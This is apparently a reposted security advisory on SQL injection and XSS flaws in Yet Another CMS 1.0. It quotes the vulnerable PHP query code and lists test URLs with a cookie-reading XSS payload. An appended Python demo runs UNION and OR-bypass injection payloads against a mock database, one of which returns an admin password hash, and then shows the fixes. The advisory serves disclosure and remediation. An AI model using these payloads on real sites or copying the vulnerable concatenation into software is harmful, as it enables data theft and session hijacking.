Title: Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
By Stefan Schurtz www.2cto.com
Affected Software: Successfully tested on Yet Another CMS 1.0
Developer Website: http://yetanothercms.codeplex.com/
Overview
Yet Another CMS 1.0 contains multiple SQL Injection and XSS vulnerabilities: the page id from index.php and the search pattern from search.php are concatenated into SQL queries unvalidated, and the search pattern is reflected into the page unencoded.
Technical analysis:
1. search.php
$result_set = get_search_result_set($_POST['pattern']);   // raw POST value
2. includes/functions.php
function get_search_result_set($pattern, $public = true) {
    global $connection;
    // $pattern is interpolated twice, in LOCATE() and in the LIKE clause, with no escaping
    $query = "SELECT
        id,
        subject_id,
        menu_name,
        position,
        visible,
        content,
        CONCAT('...', SUBSTRING(content, LOCATE('" . $pattern . "', content), 200), '...') as fragment
    FROM
        pages
    WHERE
        content like '%" . $pattern . "%'";
3. index.php
<?php find_selected_page(); ?>
4. includes/functions.php
function find_selected_page() {
    global $sel_subject;
    global $sel_page;
    if (isset($_GET['subj'])) {
        $sel_subject = get_subject_by_id($_GET['subj']);
        $sel_page = get_default_page($sel_subject['id']);
    } elseif (isset($_GET['page'])) {
        $sel_subject = NULL;
        $sel_page = get_page_by_id($_GET['page']);   // raw GET value
    } else {
        $sel_subject = NULL;
        $sel_page = NULL;
    }
}
function get_page_by_id($page_id) {
    global $connection;
    $query = "SELECT * ";
    $query .= "FROM pages ";
    $query .= "WHERE id=" . $page_id . " ";   // unquoted and never cast to int
    $query .= "LIMIT 1 ";
============================
Test
============================
SQL Injection
http://www.bkjia.com/index.php?page=[SQL injection]
http://www.bkjia.com/search.php -> 'search field' -> [SQL injection]
XSS
http://www.bkjia.com/search.php -> 'search field' -> '"</script><script>alert(document.cookie)</script>
http://www.bkjia.com/index.php?page='</script><script>alert(document.cookie)</script>
www.2cto.com solution:
Filter the input on the affected pages: treat index.php?page= as an integer (cast it, or bind it as a prepared-statement parameter), bind the search pattern as a query parameter instead of concatenating it into the SQL, and HTML-encode it with htmlspecialchars() before echoing it back.
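The two sinks from the analysis above, the payload shapes from the Test section, and the fix, as an added runnable illustration that is not part of this advisory or of Yet Another CMS. It rebuilds the vulnerable query construction of get_page_by_id() and get_search_result_set() over a constructed in-memory SQLite table (SQLite stands in for the product's MySQL, so CONCAT/LOCATE become ||/INSTR), runs a UNION payload against the page id and an OR payload against the search field, then shows the hardened form: an integer-cast, bound page id; a bound LIKE parameter with wildcard escaping; and HTML encoding of the reflected pattern. The users table, its contents, both SQL payloads and the row data are assumptions made for the demo; the XSS string is the advisory's own.

```python
import html
import sqlite3

# Constructed stand-in for the CMS database. Assumptions: SQLite instead of
# the product's MySQL, and a `users` table that the advisory does not show,
# added only to give the UNION something to read.
SCHEMA = """
CREATE TABLE pages (id INTEGER PRIMARY KEY, subject_id INTEGER, menu_name TEXT,
                    position INTEGER, visible INTEGER, content TEXT);
CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, hashed_password TEXT);
INSERT INTO pages VALUES (1, 1, 'Home', 1, 1, 'Welcome to the site');
INSERT INTO pages VALUES (2, 1, 'Drafts', 2, 0, 'Unpublished notes');
INSERT INTO users VALUES (1, 'admin', 'sha1:5baa61e4c9b93f3f');
"""

# Assumed payloads for the two sinks (index.php?page= and the search field);
# the XSS string is the one given in the advisory.
PAGE_PAYLOAD = "0 UNION SELECT id, username, hashed_password, 0, 0, 0 FROM users"
SEARCH_PAYLOAD = "%' OR '1'='1"
XSS_PAYLOAD = "'\"</script><script>alert(document.cookie)</script>"


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


# --- vulnerable builders, mirroring the advisory's string concatenation ---

def get_page_by_id_vuln(conn, page_id):
    query = "SELECT * "
    query += "FROM pages "
    query += "WHERE id=" + str(page_id) + " "   # unquoted, never validated
    query += "LIMIT 1 "
    return conn.execute(query).fetchall()


def get_search_result_set_vuln(conn, pattern):
    # the pattern lands in the statement twice: inside INSTR() and inside LIKE
    query = ("SELECT id, subject_id, menu_name, position, visible, content, "
             "'...' || SUBSTR(content, INSTR(content, '" + pattern + "'), 200) "
             "|| '...' AS fragment "
             "FROM pages WHERE content LIKE '%" + pattern + "%'")
    return conn.execute(query).fetchall()


# --- hardened builders ---

def get_page_by_id(conn, page_id):
    page_id = int(page_id)   # ?page= is an id: anything non-numeric is rejected
    return conn.execute(
        "SELECT * FROM pages WHERE id = ? LIMIT 1", (page_id,)).fetchall()


def escape_like(s):
    # a bound parameter stops injection but not LIKE wildcards: escape % and _
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def get_search_result_set(conn, pattern):
    return conn.execute(
        "SELECT id, subject_id, menu_name, position, visible, content, "
        "'...' || SUBSTR(content, INSTR(content, ?), 200) || '...' AS fragment "
        "FROM pages WHERE content LIKE ? ESCAPE '\\'",
        (pattern, "%" + escape_like(pattern) + "%")).fetchall()


def render_search_header(pattern):
    # search.php reflects the pattern into the page: encode it for HTML context
    return "<p>Results for: " + html.escape(pattern, quote=True) + "</p>"


def demo():
    conn = connect()
    out = {}
    # index.php?page=<UNION ...>: the single row returned is the admin credential row
    out["page_union"] = get_page_by_id_vuln(conn, PAGE_PAYLOAD)
    # search: a lone quote breaks the statement (the classic first probe)
    try:
        get_search_result_set_vuln(conn, "'")
        out["quote_breaks_query"] = False
    except sqlite3.OperationalError:
        out["quote_breaks_query"] = True
    # search: the OR payload discards the LIKE filter and returns every page
    out["search_bypass_ids"] = [r[0] for r in get_search_result_set_vuln(conn, SEARCH_PAYLOAD)]
    # hardened: the same payload is literal text and matches nothing,
    # a bare wildcard matches nothing, a real word still works
    out["fixed_search_ids"] = [r[0] for r in get_search_result_set(conn, SEARCH_PAYLOAD)]
    out["fixed_wildcard_ids"] = [r[0] for r in get_search_result_set(conn, "%")]
    out["fixed_real_search_ids"] = [r[0] for r in get_search_result_set(conn, "notes")]
    out["fixed_header"] = render_search_header(XSS_PAYLOAD)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=", value)
```

The PHP equivalents of the hardened calls are intval() or a bound parameter for the page id, a mysqli/PDO prepared statement with the pattern bound for the search query, and htmlspecialchars($pattern, ENT_QUOTES) at the point where search.php echoes it. Note that HTML encoding is only correct for text and attribute contexts; a value placed inside an existing script block needs JavaScript-context encoding instead.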